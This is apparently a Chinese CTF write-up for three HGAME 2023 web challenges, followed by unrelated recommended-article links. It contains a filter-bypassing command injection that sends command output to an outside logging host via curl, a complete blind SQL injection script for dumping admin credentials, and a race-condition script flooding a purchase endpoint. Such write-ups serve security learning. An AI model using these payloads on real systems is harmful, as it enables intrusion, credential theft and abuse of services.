Ping to the host

很明显的rce,简单测试一下发现空格,cat,;被办,且执行无回显,空格用${IFS},%09,$IFS$9等等来绕过,我们利用dnslog将执行结果外带出来,这里使用的是http://ceye.io/

由于每次dnslog只能带出一条信息,我们利用sed -n来爆破其它信息

ip=|curl${IFS}http://?????.ceye.io/`ls${IFS}/|sed${IFS}-n${IFS}'1p'`

得到flag文件名为: flag_is_here_haha

flag也被办了,用通配符读取就行了

ip=|curl${IFS}http://?????.ceye.io/`ca''t%09/fla*`

Login To Get My Gift

简单的SQL注入,得到admin账号密码即可得到flag,这里直接给exp:
import requests

flag = ''

def attack_post(url):

    global flag

    r = requests.session()

    for i in range(1, 100000):

        low = 32

        high = 127

        mid = (low + high) // 2

        while low < high:

            payload = f"a'/**/||/**/((ascii(right(left(database(),{i}),1)))<{mid})#"

            payload1 = f"a'/**/||/**/((ascii(right(left((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/regexp/**/database()),{i}),1)))<{mid})#"

            payload2 = f"a'/**/||/**/((ascii(right(left((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/regexp/**/'User1nf0mAt1on'),{i}),1)))<{mid})#"

            payload3 = f"a'/**/||/**/((ascii(right(left((select/**/group_concat(concat_ws(':',UsErN4me,PAssw0rD))/**/from/**/User1nf0mAt1on),{i}),1)))<{mid})#"

            # print(payload)

            data = {

                'username': 'testuser',

                'password': payload3

            }

            rp = r.post(url, data=data)

            # print(rp.text)

            if 'Success!' in rp.text:

                high = mid

            else:

                low = mid + 1

            mid = (low + high) // 2

        if low <= 32 or high >= 127:

            break

        flag += chr(mid - 1)

        print(flag)

if __name__ == '__main__':

    url = 'http://week-3.hgame.lwsec.cn:30369/login'

    attack_post(url)

Gopher Shop

下载附件是源码,先对题目环境分析一波,是一个商店的界面,售卖一些商品,其中有FLAG,可以知道肯定需要买到这个FLAG
接下来分析源码,找到user.go这个文件,这里面是对销售的一些功能实现,往下可以看到判断是否卖的出这个函数,if判断后,直接
对商品数量进行加减,这里猜测可以条件竞争,直接过if买到FLAG,其实正解应该是go的uint溢出,这里应该算非预期了。
import requests

import threading

headers = {

    'Cookie': 'SESSION=MTY3NDU1MjI0MnxEdi1CQkFFQ180SUFBUkFCRUFBQUlfLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBY0FCV0ZrYldsdXw23LorOFg5LmryZzZcxm8ESbYpNFaTv1UjY2UkMozyJw==; session=MTY3NDcwNzYyM3xEdi1CQkFFQ180SUFBUkFCRUFBQUpfLUNBQUVHYzNSeWFXNW5EQW9BQ0hWelpYSnVZVzFsQm5OMGNtbHVad3dIQUFWaFpHMXBiZz09fM5a-9HM-2vbFCrfAbfLVU049emtbxCloYDTab3QDEx-'

}

def get(url):

    r = requests.get(url=url, headers=headers)

if __name__ == '__main__':

    url = 'http://week-3.hgame.lwsec.cn:30552/api/v1/user/buyProduct?product=Flag&number=1'

    for i in range(100000):

        threading.Thread(target=get, args=(url,)).start()

然后界面就直接买到FLAG了,checkFLAG即可拿到flag值:

hgame{GopherShop_M@gic_1nt_0verflow}

HGAME_2023_WEB_WP_WEEK3的更多相关文章

随机推荐

  1. HDC2022的无障碍参会体验,手语服务是如何做到的?

    华为开发者大会2022(HDC)上,HMS Core手语数字人以全新形象亮相,并在直播中完成了长达3个多小时的实时手语翻译,向线上线下超过一千万的观众提供了专业.实时.准确的手语翻译服务,为听障人士提 ...

  2. day28 BOM浏览器对象 & 定时事件与Cookie & (视频卷子讲解)

    3.10 BOM浏览器对象模型 3.10.1 window对象 所有浏览器都支持window对象,它表示浏览器窗口: | 属性 | history 网页历史记录 返回History只读对象 locat ...

  3. 数电第11周周结_by_yc

    Lab7_时序逻辑验证 一.简易电子时钟 功能描述:   设计一简易电子时钟,支持时.分.秒显示,其中HEX7-HEX6显示时,HEX5-HEX4显示分,HEX1-HEX0显示秒,假设进制为:18秒= ...

  4. JavaFX入门笔记

    JavaFX入门笔记 背景 Java选修课第四次实验 所需工具 IDEA JavaFX插件(需要Maven) JavaFX Scene Builder 参考资料 https://www.yiibai. ...

  5. python什么是异常?如何处理异常

    异常处理 什么是异常 异常是程序错误发生的信号.程序一旦出现错误,就会产生一个异常,如果程序中没有处理该异常,该异常就会抛出来,程序的运行也随即终止. 错误分为两种 1.语法错误 2.逻辑错误 如何处 ...

  6. for循环结构、range方法

    目录 今日内容总结 whlie补充说明 for循环结构 range方法 练习 今日内容总结 whlie补充说明 1.死循环 真正死循环是一旦执行 CPU功耗会急速上升 直到系统采取紧急措施 尽量不要让 ...

  7. uniapp 微信小程序 实现左侧菜单右侧列表,双向联动的效果

    <template> <view class="u-wrap"> <view class="u-search-box"> & ...

  8. 【nginx】代理设置Host

    旧文章从语雀迁移过来,原日期为2021-02-18 nginx 的 proxy 模块使我们经常会用到的模块之一,比如我们常用的 nginx 反向代理. 反向代理我们一般有这么几行配置代码: locat ...

  9. Apache HttpClient 5 笔记: SSL, Proxy 和 Multipart Upload

    Apache HttpClient 5 最近要在非SpringBoot环境调用OpenFeign接口, 需要用到httpclient, 注意到现在 HttpClient 版本已经到 5.2.1 了. ...

  10. [OpenCV实战]26 基于OpenCV实现选择性搜索算法

    目录 1 背景 1.1 目标检测与目标识别 1.2 滑动窗口算法 1.3 候选区域选择算法 2 选择性搜索算法 2.1 什么是选择性搜索? 2.2 选择性搜索相似性度量 2.3 结果 3 代码 4 参 ...